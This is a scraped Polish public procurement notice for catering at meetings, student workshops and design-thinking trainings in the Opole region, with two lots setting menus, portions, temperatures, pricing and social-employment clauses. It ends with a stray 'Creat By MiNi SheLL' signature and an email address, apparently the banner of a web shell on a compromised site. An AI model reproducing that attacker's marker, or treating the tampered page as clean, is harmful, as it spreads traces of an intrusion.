                <b>Nazwa: </b>Świadczenie usług cateringowych na potrzeby spotkań, warsztatów i wizyt przygotowawczych w ramach projektu 9.2.1 Opolskie szkolnictwo zawodowe bliżej rynku pracy 2 współfinansowanego ze środków RPO WO 2014-2020.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przedmiotem zamówienia jest świadczenie usług cateringowych na potrzeby spotkań, warsztatów i wizyt przygotowawczych w ramach Projektu 9.2.1 Opolskie Szkolnictwo zawodowe bliżej rynku pracy 2 współfinansowanego ze środków RPO WO 2014  2020.
2.	Termin realizacji usługi: od dnia zawarcia umowy do 30.06.2018 r.
3.	Miejsca realizacji: na terenie województwa opolskiego, wyznaczone przez Zamawiającego.
4.	W uzasadnionych przypadkach w porozumieniu z Wykonawcą Zamawiający ma prawo do zmiany lokalizacji dowozu cateringu poza terenem województwa opolskiego.
5.	Usługa będzie polegała na przygotowaniu i dostarczeniu gorących posiłków zgodnie 
z poniższymi wymogami:
a)	Zapewnienie serwisu kawowego catering dowożony do siedziby Zamawiającego
Ilość spotkań: 20  50
Ilość osób na każde spotkanie: 3  15
Godzinę i datę dostarczenia serwisu kawowego za każdym razem będzie wskazywane przez Zamawiającego
b)	Zapewnienie lunchu na spotkania uczniów  catering dowożony:
Ilość spotkań: 12 - 15
Ilość osób na każde spotkanie: 30  60 osób
Miejsce dostarczenia cateringu każdorazowo będzie wskazywane przez Zamawiającego
c)	Zapewnienie lunchu na spotkania regionalne:
Ilość spotkań: 12  15
Ilość osób na każde spotkanie: 20  60
Miejsce dostarczenia cateringu każdorazowo będzie wskazywane przez Zamawiającego
6.	Wymagania dotyczące usługi cateringowej:
a)	Przerwa kawowa, o której mowa w pkt. 5a ma składać się z pakietu kawowego obejmującego w każdym jednostkowym pakiecie kawowym następujące elementy:
1.	gorącą kawę w termosach zawierających parzoną kawę 100 % arabica  min. 200 ml/osobę
2.	gorącą wodę w termosach do zaparzania herbaty  min. 200 ml/osobę
3.	herbata w torebkach pakowanych pojedynczo  do wyboru co najmniej 2 rodzaje spośród ( czarna, zielona, owocowa, miętowa)  min. 2 torebki herbaty/ osobę.
4.	Woda mineralna niegazowana i gazowana do wyboru w butelkach: 0,33 lub 0,5 l 
(500ml/os).
5.	Mleko lub śmietanka do kawy jednorazowa pakowane pojedynczo min. 20 g/os.
6.	Cukier  min. 10 g/os
7.	cytryna do herbaty ( plasterki lub cytrynki w płynie jednorazowe) 
8.	Kruche ciastka bankietowe, minimum 3 rodzaje  łącznie minimum 40 g/osobę
9.	Do pakietów kawowych za każdym razem mają być dołączone jednorazowe naczynia, w tym kubeczki jednorazowe przeznaczone do napojów gorących, łyżeczki jednorazowe oraz talerzyki.
b)	Lunch na spotkania uczniów  catering dowożony, o którym mowa w pkt. 5 b ma być podany w formie szwedzkiego bufetu oraz ma składać się z następujących elementów:
1.	zupa  min. 200 ml na osobę 
2.	drugie danie obejmujące:
	danie mięsne na ciepło w bemarze umożliwiającym utrzymanie wysokiej temperatury na czas serwowania posiłku  1 rodzaj dania: (150 g/ osobę) 
	danie bezmięsne na ciepło w bemarze umożliwiającym utrzymanie wysokiej temperatury na czas serwowania posiłku   1 rodzaj dania: filet rybny (łosoś, sola, pstrąg bądź droższe, 150 g/ osobę).
Danie mięsne oraz bezmięsne na ciepło w proporcji 50/50
	zestaw dodatków skrobiowych w bemarze umożliwiającym utrzymanie wysokiej temperatury na czas serwowania posiłku (150 g/ osobę) 
	zestaw dodatków warzywnych na ciepło lub surówka (150 g/ osobę)
	napoje składające się z soku 100 % (2 rodzaje z podanych: pomarańczowy, grapefruitowy, jabłkowy), woda mineralna gazowana i niegazowana 50/50                                       w butelkach o pojemności nie mniejszej niż 0,33 l oraz nie większej niż 0,5 l/ osobę
c)	Zapewnienie lunchu na spotkania regionalne, o którym mowa w pkt. 5 c:
1.	zupa  min. 200 ml na osobę 
2.	drugie danie obejmujące:
	danie mięsne na ciepło w bemarze umożliwiającym utrzymanie wysokiej temperatury na czas serwowania posiłku  1 rodzaj dania: (150 g/ osobę) 
	danie bezmięsne na ciepło w bemarze umożliwiającym utrzymanie wysokiej temperatury na czas serwowania posiłku   1 rodzaj dania: filet rybny (łosoś, sola, pstrąg bądź droższe, 150 g/ osobę).
	danie mięsne oraz bezmięsne na ciepło w proporcji 50/50
	zestaw dodatków skrobiowych w bemarze umożliwiającym utrzymanie wysokiej temperatury na czas serwowania posiłku (150 g/ osobę) 
	zestaw dodatków warzywnych na ciepło lub surówka (150 g/ osobę)
	napoje składające się z soku 100 % (2 rodzaje z podanych: pomarańczowy, grapefruitowy, jabłkowy), woda mineralna gazowana i niegazowana 50/50                                       w butelkach o pojemności nie mniejszej niż 0,33 l oraz nie większej niż 0,5 l/osobę

-	Zamawiający nie dopuszcza powtarzalności tej samej zupy oraz tego samego drugiego dania       w przypadku gdy spotkanie, na które musi być dostarczony catering będzie trwało w tym samym miejscu 2 dni lub więcej.
-	W przypadku gdy w spotkaniach uczestniczyć będą osoby pozostające na diecie wegetariańskiej lub cierpiące na alergie pokarmowe Wykonawca zobowiązany jest do przygotowania i odpowiedniego oznaczenia gorącego posiłku odpowiadającego potrzebom tych osób przy zachowanie gramatury wskazanej powyżej. Zamawiający powiadomi Wykonawcę o ww. uczestnikach co najmniej 3 dni przed realizacją zamówienia.
-	Przed podpisaniem umowy Wykonawca zobowiązany jest do przedstawienia proponowanego jadłospisu w  5 różnych wersjach dań obiadowych dla punktów 5b i 5c. Wykonawca przed każdym spotkaniem zaproponuje co najmniej 2 różne propozycje menu.
-	Menu przed każdym spotkaniem wymagać będzie akceptacji Zamawiającego. Zamawiający może zgłaszać uwagi co zaproponowanego przez Wykonawcę menu.
-	Posiłki muszą być bezwzględnie świeże oraz charakteryzować się wysoką jakością 
w odniesieniu do użytych składników. Posiłki muszą być przygotowywane z surowców wysokiej jakości, świeżych, naturalnych, mało przetworzonych, z ograniczoną ilością substancji konserwujących, zagęszczających, barwiących lub sztucznie aromatyzowanych. Posiłki nie mogą być wykonywane z produktów typu instant, np. zupy w proszku i sosy 
w posiłku oraz produktów gotowych.
-	Temperatura posiłku ciepłego wydawanego musi mieścić się w granicach 60-75 stopni Celsjusza.
-	Nie dopuszcza się zaniżania ustalonej wagi posiłków lub temperatury ciepłego posiłku.
-	Zamawiający zastrzega sobie prawo do dokonywania badań sprawdzających obejmujących w szczególności przydatność do spożycia, wagę lub temperaturę posiłków. W przypadku stwierdzenia, że posiłek nie spełnia parametrów określonych w zamówieniu, kosztami badania Zamawiający obciąży Wykonawcę
-	Przy dostawie wszystkich posiłków i napoi do miejsca realizacji zamówienia, Wykonawca zobowiązany jest przestrzegać podstawowe normy sanitarne oraz BHP.
-	Wykonawca w ramach zamówienia ma zagwarantować
a)	zapewnienie odpowiednich urządzeń grzewczych, w tym przedłużaczy, kabli niezbędnych do podłączenia i wykonania usługi ,
b)	zastawę stołową (ceramiczną lub porcelanową) - filiżanki, talerzyki, talerze, bulionówki  odpowiednio do serwowanych potraw,
c)	naczynia szklane na soki i wodę mineralną,
d)	sztućce ze stali nierdzewnej,
e)	stoły wraz z nakryciem (obrusy, serwety, serwetki jednorazowe),
f)	obsługę kelnerską
g)	zebranie wszelkich przedmiotów oraz resztek po zrealizowaniu usługi.
-	Zamawiający przekaże Wykonawcy na adres mailowy (wskazany przez Wykonawcę do kontaktów) informacje o liczbie uczestników dla których Wykonawca ma każdorazowo dostarczyć catering, najpóźniej dzień przed realizacją usługi. 
-	Zamawiający zastrzega, iż zapłata zostanie dokonana wyłącznie za faktycznie przekazaną liczbę uczestników każdorazowego spotkania.
-	Za wykonanie każdej jednostkowej usługi cateringowej Wykonawca otrzyma wynagrodzenie stanowiące iloczyn wskazanych na dane spotkanie osób x stawka za 1 uczestnika brutto.
-	Podstawą do ustalenia kwoty na fakturze będzie protokół odbioru każdorazowej usługi jednostkowej gdzie wskazana będzie liczba uczestników spotkania, którą Zamawiający poda Wykonawcy najpóźniej na dzień przed realizacją usługi  x stawka za 1 uczestnika brutto.
7.	Klauzule społeczne.
1)	Na podstawie  art. 29 ust. 4 ustawy Prawo zamówień publicznych zamawiający wymaga aby wśród osób bezpośrednio uczestniczących w wykonaniu zamówienia zatrudniona była minimum jedna osoba:  
a)	bezrobotna,
b)	młodociana  w celu przygotowania zawodowego, 
c)	z niepełnosprawnościami ,
d)	bezdomna, realizująca indywidualny program wychodzenia z bezdomności,
e)	uzależnioną od alkoholu po zakończeniu programu psychoterapii w zakładzie lecznictwa odwykowego,
f)	uzależniona od narkotyków lub innych środków odurzających po zakończeniu programu terapeutycznego w zakładzie opieki zdrowotnej,
g)	chora psychicznie,
h)	zwalniana z zakładów karnych,
i)	uchodźca realizujący indywidualny program integracji.
2)	Osoba, o której mowa w pkt. 1 musi zostać zatrudniona przez Wykonawcę realizującego niniejsze zamówienie na podstawie umowy o pracę lub umowy cywilnoprawnej przez okres co najmniej 3 miesięcy w okresie trwania niniejszej umowy. 
3)	Wykonawca zobowiązany jest do uwzględnienia w umowie z osobą, o której mowa w pkt. 1 zgody na przetwarzanie jej danych osobowych na potrzeby czynności kontrolnych przewidzianych w projekcie.    
4)	Każdorazowo wraz z fakturą Wykonawca zobowiązany jest do złożenia pisemnego oświadczenia o spełnianiu klauzul społecznych zawierającego informacje o liczbie osób wskazanych w pkt. 1, formie ich zatrudnienia, czasie trwania umowy oraz powierzonych 
w jej ramach zadaniach.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>55520000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  68750<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>kauzule społeczne</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Świadczenie usług cateringowych w trakcie wyjazdów szkoleniowych i spotkań roboczych multidyscyplinarnych zespołów kreatywnego myślenia "design thinking" organizowanych przez OCRG w ramach projektu nr RPOP.09.02.01-16-0028/15 pn. Opolskie Szkolnictwo Zawodowe bliżej rynku pracy 2, współfinansowanego ze środków RPO WO 2014-2020.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przedmiotem zamówienia jest świadczenie usług cateringowych w trakcie wyjazdów szkoleniowych i spotkań roboczych multidyscyplinarnych zespołów kreatywnego myślenia Design Thinking organizowanych przez Opolskie Centrum Rozwoju Gospodarki w ramach projektu RPOP.09.02.01-16-0028/15 pn. Opolskie Szkolnictwo Zawodowe bliżej rynku pracy 2 współfinansowanego ze środków RPO WO 2014  2020.
2.	2.  Usługa będzie polegała na przygotowaniu i dostarczeniu posiłków w ramach szkoleń oraz spotkań roboczych multidyscyplinarnych zespołów kreatywnego myślenia Design Thinking.
3.	3.  Termin realizacji usługi: od dnia zawarcia umowy do 30.06.2018 r.
4.	4.  Miejsce realizacji: na terenie województwa opolskiego, wyznaczone przez Zamawiającego.
5.	Wymagania dotyczące usługi:
1)	Zapewnienie poczęstunku obiadowego:
Ilość spotkań : 
10 spotkań w 2016 r.
10 spotkań w 2017 r.
Ilość osób na każde spotkanie: 6-15 osób.
2)	Zapewnienie zestawów śniadaniowych:
Ilość spotkań : 100-150.
Ilość osób na każde spotkanie: 3-5 osób.

6.	Poczęstunek obiadowy w formie szwedzkiego bufetu, składający się z następujących elementów:
1)	Danie mięsne na ciepło w bemarze umożliwiającym utrzymanie wysokiej temperatury na czas serwowania posiłku  1 rodzaj dania: (150 g/ osobę).
2)	Danie bezmięsne na ciepło w bemarze umożliwiającym utrzymanie wysokiej temperatury na czas serwowania posiłku   1 rodzaj dania: filet rybny (łosoś, sola, pstrąg bądź droższe, 150 g/ osobę). Danie mięsne oraz bezmięsne na ciepło w proporcji 50/50.
3)	Zestaw dodatków skrobiowych w bemarze umożliwiającym utrzymanie wysokiej temperatury na czas serwowania posiłku (150 g/ osobę).
4)	2 zestawy dodatków warzywnych, w tym jeden na ciepło w bemarze umożliwiającym utrzymanie wysokiej temperatury na czas serwowania posiłku  (150 g/ osobę).
5)	Soki owocowe 100% (2 rodzaje z podanych: pomarańczowy lub grapefruitowy lub jabłkowy), woda mineralna gazowana i niegazowana 50/50 w plastikowych  butelkach o poj. nie większej niż 0,5l.
Zamawiający nie dopuszcza powtarzalności zupy oraz drugiego dania w okresie kolejnych 
3 dni szkoleniowych jeśli wystąpią po sobie.
7.	Zestaw śniadaniowy zapakowany osobno dla każdego uczestnika zmusi zawierać następujące produkty:
1)	sok pomarańczowy w 100% naturalny o pojemności 0,33l w zakręcanej plastikowej - butelce 1 szt.,
2)	Woda mineralna niegazowana o pojemności nie mniejszej niż 0,5l w zakręcanej plastikowej butelce  1 sz.,
3)	2 różne owoce (np. jabłko i banan),
4)	bułka duża o średnicy nie mniejszej niż 12 cm z każdym z następujących składników: masło, wędlina, żółty ser, sałata, warzywa (pomidor,  ogórek) - 1 szt.,
5)	bułka duża o średnicy nie mniejszej niż 12 cm z każdym z następujących składników: masło, żółty ser, sałata, warzywa(np. pomidor, ogórek)  1 szt.
Zestaw śniadaniowy musi zostać dostarczony do siedziby Zamawiającego lub innego miejsca na terenie Opola wskazanego przez Zamawiającego. Odbiór zestawu śniadaniowego nastąpi w Opolu przez osobę wyznaczoną przez Zamawiającego w terminie i miejscu wskazanym najpóźniej na dzień przed realizacją usługi.
-	W przypadku gdy w szkoleniu uczestniczyć będą osoby pozostające na diecie wegetariańskiej lub cierpiące na alergie pokarmowe Wykonawca zobowiązany jest do przygotowania i odpowiedniego oznaczenia gorącego posiłku odpowiadającego potrzebom tych osób przy zachowanie gramatury wskazanej powyżej. Zamawiający powiadomi Wykonawcę o ww. uczestnikach co najmniej 3 dni przed realizacją zamówienia.
-	Posiłki muszą być bezwzględnie świeże oraz charakteryzować się wysoką jakością 
w odniesieniu do użytych składników. Posiłki muszą być przygotowywane z surowców wysokiej jakości, świeżych, naturalnych, mało przetworzonych, z ograniczoną ilością substancji konserwujących, zagęszczających, barwiących lub sztucznie aromatyzowanych. Posiłki nie mogą być wykonywane z produktów typu instant, np. zupy w proszku i sosy w posiłku oraz produktów gotowych.
-	Temperatura posiłku wydawanego musi mieścić się w granicach 60-75 stopni Celsjusza.
-	Nie można zaniżać ustalonej wagi posiłków lub temperatury ciepłego posiłku pod groźbą zastosowania kar umownych.
-	Zamawiający zastrzega sobie prawo do dokonywania badań sprawdzających obejmujących w szczególności przydatność do spożycia, wagę lub temperaturę posiłków. W przypadku stwierdzenia, że posiłek nie spełnia parametrów określonych w zamówieniu, kosztami badania Zamawiający obciąży Wykonawcę.
-	Przy dostawie gorących posiłków do miejsca realizacji zamówienia, Wykonawca zobowiązany jest przestrzegać podstawowe normy sanitarne oraz BHP.
-	Wykonawca  przy dostawie poczęstunku obiadowego musi zapewnić:
a)	odpowiednie urządzenia grzewcze, w tym przedłużacze, kable niezbędne do podłączenia 
i wykonania usługi ,
b)	zastawę stołową (ceramiczną lub porcelanową) - filiżanki, talerzyki, talerze, bulionówki  odpowiednio do serwowanych potraw,
c)	naczynia szklane na soki i wodę mineralną,
d)	sztućce ze stali nierdzewnej,
e)	stoły wraz z nakryciem (obrusy, serwety, serwetki jednorazowe),
f)	obsługę kelnerską,
g)	zebranie wszelkich przedmiotów oraz resztek po zrealizowaniu usługi.

-	Zamawiający przekaże Wykonawcy na adres mailowy (wskazany przez Wykonawcę do kontaktów) informacje o liczbie uczestników, dla których Wykonawca ma dostarczyć zestaw obiadowy lub zestaw śniadaniowy najpóźniej dzień przed realizacją usługi. 
-	Zamawiający zastrzega, iż zapłata zostanie dokonana wyłącznie za faktycznie przekazaną uczniom liczbę zestawów obiadowych i śniadaniowych.
-	Cena  jednostkowa zestawu śniadaniowego nie może przekroczyć  15,00 PLN/ osobę.
-	Cena jednostkowa poczęstunku obiadowego nie może przekroczyć  35,00 PLN/ osobę.
-	Odbiór zestawów obiadowych i śniadaniowych zostanie każdorazowo potwierdzony przez osobę wyznaczoną przez Zamawiającego na protokole odbioru według wzoru przygotowanego przez Zamawiającego dostarczonego Wykonawcy w dniu podpisania umowy. 
-	Za wykonanie dostaw zestawów obiadowych i śniadaniowych Wykonawca otrzyma wynagrodzenie w wysokości stanowiącej iloczyn faktycznie wydanych zestawów x stawka za jeden zestaw.
-	Każdy zestaw śniadaniowy musi posiadać opakowanie składające się z torebki foliowej lub papierowej.
-	Okres przydatności do spożycia produktów wskazanych w zestawie śniadaniowym w pkt 1-2 musi wynosić co najmniej 1 miesiąc od dnia dostawy, produkt wskazany w pkt 4 i 5 musi być przygotowany najwcześniej 1 dzień przed wyjazdem. Produkty przed dostawą powinny być przechowywane w odpowiednich warunkach  zgodnie z obowiązującymi normami.
8.	Klauzule społeczne.
1)	Na podstawie  art. 29 ust. 4 ustawy Prawo zamówień publicznych zamawiający wymaga aby wśród osób bezpośrednio uczestniczących w wykonaniu zamówienia zatrudniona była minimum jedna osoba:  
a)	bezrobotna,
b)	młodociana  w celu przygotowania zawodowego, 
c)	z niepełnosprawnościami ,
d)	bezdomna, realizująca indywidualny program wychodzenia z bezdomności,
e)	uzależnioną od alkoholu po zakończeniu programu psychoterapii w zakładzie lecznictwa odwykowego,
f)	uzależniona od narkotyków lub innych środków odurzających po zakończeniu programu terapeutycznego w zakładzie opieki zdrowotnej,
g)	chora psychicznie,
h)	zwalniana z zakładów karnych,
i)	uchodźca realizujący indywidualny program integracji.
2)	Osoba, o której mowa w pkt. 1 musi zostać zatrudniona przez Wykonawcę realizującego niniejsze zamówienie na podstawie umowy o pracę lub umowy cywilnoprawnej przez okres co najmniej 3 miesięcy w okresie trwania niniejszej umowy. 
3)	Wykonawca zobowiązany jest do uwzględnienia w umowie z osobą, o której mowa w pkt. 1 zgody na przetwarzanie jej danych osobowych na potrzeby czynności kontrolnych przewidzianych w projekcie.    
4)	Każdorazowo wraz z fakturą Wykonawca zobowiązany jest do złożenia pisemnego oświadczenia o spełnianiu klauzul społecznych zawierającego informacje o liczbie osób wskazanych w pkt. 1, formie ich zatrudnienia, czasie trwania umowy oraz powierzonych w jej ramach zadaniach.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>55520000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  23000<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">N<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>klauzule społeczne</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com